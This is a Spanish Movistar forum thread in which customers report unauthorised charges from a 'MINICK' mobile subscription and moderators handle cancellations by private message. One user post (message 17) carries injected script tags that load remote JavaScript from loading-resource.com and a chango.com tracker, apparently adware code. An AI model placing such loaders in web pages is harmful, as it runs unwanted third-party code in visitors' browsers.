darme de baja en MINICK

nino25
Mi vida cambió con el ADSL
darme de baja en MINICK

Buenas noches comunidad.

 

Mi Niké es nino25 me presento esta noche saludos a todos/as

 

Necesito alluda.Sin suscribirme a MINICK  me a llegado esta subscripciones la cual no di de alta

 

en 10 minutos se llevo gb3 que me quedaban por fabor demen de baja en esta subscripciones

 

lo antes posible.

 

Estoy muy enojado lla que no autorice esa subscripciones espero una solución

 

 

buenas noches

 

 

(pagos Moviste: Ha dado de alta una suscripción en MINICK. At. Cliente: 902044355 )

Mensaje 1 de 45
2.718 Visitas
44 RESPUESTAS 44
YoliG-movistar
Antiguo Moderador

Hola @nino25

 

Bienvenido a la Comunidad !!!

 

Me puedes enviar un mp con tu Nº y Nif y lo miramos

 

Un salu2 Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 2 de 45
2.495 Visitas
Rafa-Movistar
Antiguo Moderador

Hola, @nino25. He retirado tu mensaje por seguridad, pues exponías al público todos tus datos personales. Si deseas enviar un mensaje privado, pulsa sobre el nombre del moderador y a continuación en "Enviar un mensaje privado a este usuario"

 

 

 

Gracias. Salu2.




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png

Mensaje 3 de 45
2.443 Visitas
nino25
Mi vida cambió con el ADSL

grasias te mando mp con los datos...estoy muy perdio x aquiEmoticono avergonzado

Mensaje 4 de 45
2.426 Visitas
nino25
Mi vida cambió con el ADSL
  1. lla le mande mp con nif yn tlf grasias Emoticono feliz
Mensaje 5 de 45
2.421 Visitas
nino25
Mi vida cambió con el ADSL
  1. Cuando dices n te refieres al tlf.....y nif al carnet de identidad si es así lla se le made esos dato estoy perdió lla boy entendiendo todo esta muy bien e descargao fotos wampare de mi pc muy way este foro Emoticono feliz
Mensaje 6 de 45
2.419 Visitas
Billy76
Más integrado que la RDSI

Hola, muy buenas, pues a mi me ha sucedido lo mismo que que nino25, me acaba de entrar hace una hora, y me sale el mismo mensaje.

Alguien me puede ayudar?

 

gracias

 

Mensaje 7 de 45
2.387 Visitas
manuelcarpio
Más integrado que la RDSI

Hola me a llegado este mensaje:

Pagos Movistar: Ha dado de alta una suscripción en MINICK. At. cliente: 902044355 soporte@net-m.es

Tengo un módem usb para internet quería saber si me cuesta mas dinero aparte del que ya tengo contratado y si es así darme de baja, también he llamado al 1004 y movistar con todos mis datos y me han dicho que no ahí nada de minick activado. Gracias.

Mensaje 8 de 45
2.367 Visitas
nino25
Mi vida cambió con el ADSL

  buenas tardes señores billi76....manuelcarpio ...

E estado informandome en el foro hay muchos foreros con este problema "minick"

y si manuelcarpio  hay foreros que se quejan x llegarles recargos de "minick"....

por lo que leo cada ves hay mas clientes movistar quejandose perdiendo dinero..

por culpa de un serbisio al que jamas se an supcrito

la moderasion grasias a su labor an dado solucion dandoles de baja en esa supcrision

"minick".. a la cual nadie se a supcrito...

.

 

Mensaje 9 de 45
2.361 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @manuelcarpio,

 

Bienvenido a la Comunidad.

 

Comentarte que la suscripción que has activado si tiene un coste adicional a tu tarifa del modem. Si quieres que te tramite la baja, puedes enviarme por mp el número de teléfono móvil y NIF.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 10 de 45
2.316 Visitas
Miklos77
Más integrado que la RDSI
 
Mensaje 11 de 45
2.308 Visitas
Miklos77
Más integrado que la RDSI
Hola buenas a mí también me está pasando lo de Minick se supone que me lo dieron de baja el mes pasado en el 1004 y éste la factura de este mes me ha vuelto llevar un cargo que puedo hacer
Mensaje 12 de 45
2.308 Visitas
YoliG-movistar
Antiguo Moderador

Hola @nino25

 

Acabo de tramitar la baja de la suscripción que tenías activada con Minick.

 

Un salu2 Emoticono feliz




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 13 de 45
2.303 Visitas
YoliG-movistar
Antiguo Moderador

Hola @Miklos77

 

Si quieres puedo comprobar en que fecha se ha solicitado la baja, para ello me puedes enviar un mp.

 

Pero recuerda que el periodo de facturación comprende desde el 18 septiembre hasta el 17 octubre y se factura el día uno de noviembre, por lo que posiblemente hayas recibido algún cargo en factura si la baja se ha gestionado dentro de los periodos indicados, de todos modos de no ser así, los importes tendrías que reclamarlos a Minick.

 

Un salu2 Emoticono feliz

 




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 14 de 45
2.302 Visitas
manuelcarpio
Más integrado que la RDSI

Hola me llego este mensaje a mo modem usb

Pagos Movistar: Ha dado de alta una suscripcion en MINICK. At. cliente: 902044355 soporte@net-m.es

queria saber si me cobran mas aparte de mi tarifa contratada??????

 

saludos

Mensaje 15 de 45
2.188 Visitas
MarianG-movistar
Antiguo Moderador

 

   Buenos días@manuelcarpio

 

Los pagos Movistar se pagan a parte de la tarifa que tengas contratada.

 

   Salu2Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 16 de 45
2.180 Visitas
Rocky666
Mi vida cambió con el ADSL

Holaaa!!

Yo tengo el mismo problema. Me sale un importe en la factura por Minick.

Saludos

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script id="__changoScript" type="text/javascript">// var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src=( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // </script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=__magnetic.init"></script>
Mensaje 17 de 45
2.132 Visitas
Susana-Movistar
Antiguo Moderador

Hola @ Rocky666,

 

Lo primero darte la bienvenida a la Comunidad Emoticono feliz. Cuando tengas un momento envíame un mensaje privado con tus datos (nombre, apellidos y NIF) y tu número e intentare ayudarte.
 
Un saludo


Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 18 de 45
2.116 Visitas
manuelcarpio
Más integrado que la RDSI

quiere deci que me cobrais más de la tarifa que tengo?

 

si es asi quiero que me deis de baja a mi contrato ya que yo no active nada y me estais cobrando por algo que yo no he activado, lo aveis hechoustedes y si es algo de cobro debo estar avisado y averlo hecho yo no ustedes, y al cual tambien llame al 1004 desde una tienda movistar y todos me dijeron que no estaba de alta...ese dinero de mas no debe ser cobrado ya el cual os dije todo lo que ha pasado,

espero respuesta

Mensaje 19 de 45
2.088 Visitas
Rocky666
Mi vida cambió con el ADSL
Hola Quiero que me devuelvan los 5,13 euros que abone por este servicio que no he pedido. Saludos
Mensaje 20 de 45
2.040 Visitas
Susana-Movistar
Antiguo Moderador

Hola @ Rocky666,

 

 Lo lamento pero no procede abonoEmoticono triste. Para dar de alta el servicio hay que  aceptar de manera expresa la compra de dicho servicio.

 

Un saludo



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 21 de 45
2.024 Visitas
Gloriayaya
Más integrado que la RDSI

Hola soy Gloria de 70 años y hace poco contrate la tarifa fusión movistar. Y ahora me ha llegado una factura doble, y una de ellas es de 24,83euros que me han dicho que pertenece a unas descargas con el nombre de MINICK  y que no he dado ninguna autorización. Me lo dijeron llamando al 1004, y tras tenerme 15 minutos al teléfono, para que me dieran de baja, me colgaron. Querría saber que es esto de Minick, que además de dijeron que la descarga se hizo con un modem tipo "pincho" que me dijeron que estaba incluido en la tarifa fusión movistar y quiero que me den de baja de este tal Minick, y saber si tiene algo que ver con el modem "pincho".

Etiquetas (2)
Mensaje 22 de 45
1.989 Visitas
TaniaN-movistar
Antiguo Moderador

Hola @Gloriayaya

 
 
 
Minick es una suscripción que activa el usuario de la línea y que pertenece a una empresa proveedora de servicios a teléfonos móviles ajena a Movistar. Para intentar ayudarte a dar de baja esta suscripción y evitar así cargos no deseados, envíame por favor un mensaje privado con el nº de teléfono móvil donde se factura la suscripción y el Nif del titular.
 
 
Un saludo y bienvenida a esta Comunidad Emoticono muy feliz


Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 23 de 45
1.975 Visitas
TaniaN-movistar
Antiguo Moderador

Hola @Gloriayaya

 

 

Ya tienes la suscripción desactivada desde esta noche Guiño

 

 

Un saludo!!



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 24 de 45
1.951 Visitas
pepiss13
Más integrado que la RDSI

hola hoy he recibido mi factura y me aparece el concepto minick.que es?como lo doi de baja?como se activo??

gracias un saludo

Mensaje 25 de 45
1.942 Visitas